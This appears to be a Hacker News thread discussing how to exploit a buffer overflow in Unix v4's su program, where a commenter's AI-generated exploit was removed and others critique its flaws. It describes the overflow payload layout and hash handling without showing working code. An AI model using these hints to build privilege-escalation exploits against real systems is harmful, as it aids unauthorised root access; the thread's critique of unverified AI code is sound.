Comment by b-kuiper
2 days ago
so, is there already somebody that wrote the exploit for it? are there any special things to consider exploiting such architecture back in the day or do the same basic principles apply?
2 days ago
so, is there already somebody that wrote the exploit for it? are there any special things to consider exploiting such architecture back in the day or do the same basic principles apply?
Yeah, somebody came up with one here: https://news.ycombinator.com/item?id=46469897
EDIT: removed due to low effort and mark-up issues. thank you all for your feedback.
perhaps the downvoters can tell me why they are downvoting? i'm curious to hear whether if this would work on unix v4 or whether there are special things to consider. I thought i would ask claude for a basic example so people could perhaps provide feedback. i guess people consider it low effort reply? anyway, thanks for your input.
Your response is a non-sequitur that does not answer the question you yourself posed, and you are responding to yourself with a chatbot. Given that it is a non-sequitur, presumably it is also the case that no work was done to verify whether the output of the LLM was hallucinated or not, so it is probably also wrong in some way. LLMs are token predictors, not fact databases; the idea that it would be reproducing a “historical exploit” is nonsensical. Do you believe what it says because it says so in a code comment? Please remember what LLMs are actually doing and set your expectations accordingly.
More generally, people don’t participate in communities to have conversations with someone else’s chatbot, and especially not to have to vicariously read someone else’s own conversation with their own chatbot.
The explanation it gives at the start appears to be on the right track but then the post has two separate incomplete/flawed attempts at coding it. (The first one doesn't actually put the expected crypt() output in the payload, and the second one puts null bytes in the password section of the payload where they can't go.)
> perhaps the downvoters can tell me why they are downvoting?
Not one of the actual downvoters, but:
Lack of proper indenting means your code as posted doesn't even compile. e.g. I presume there was a `char* p;` that had `*` removed as markdown.
Untested AI slop code is gross. You've got two snippets doing more or less the same thing in two different styles...
First one hand-copies strings character by character, has an incoherent explaination about what `pwbuf` actually is (comment says "root::", code actually has "root:k.:\n", but neither empty nor "k." are likely to be the hash that actually matches a password of 100 spaces plus `pwbuf` itself, which is presumably what `crypt(password)` would try to hash.)
Second one is a little less gross, but the hardcoded `known_hash` is again almost certainly incorrect... and if by some miracle it was accurate, the random unicode embedded would cause source file encoding to suddenly become critical to compiling as intended, plus the `\0`s written to `*p` mean su.c would hit the `return;` here before even attempting to check the hash, assuming you're piping the output of these programs to su:
A preferrable alternative to random nonsensical system specific hardcoded hashes would be to simply call `crypt` yourself, although you might need a brute force loop as e.g. `crypt(password);` in the original would presumably overflow and need to self-referentially include the `pwbuf` and thus the hash. That gets messy...
3 replies →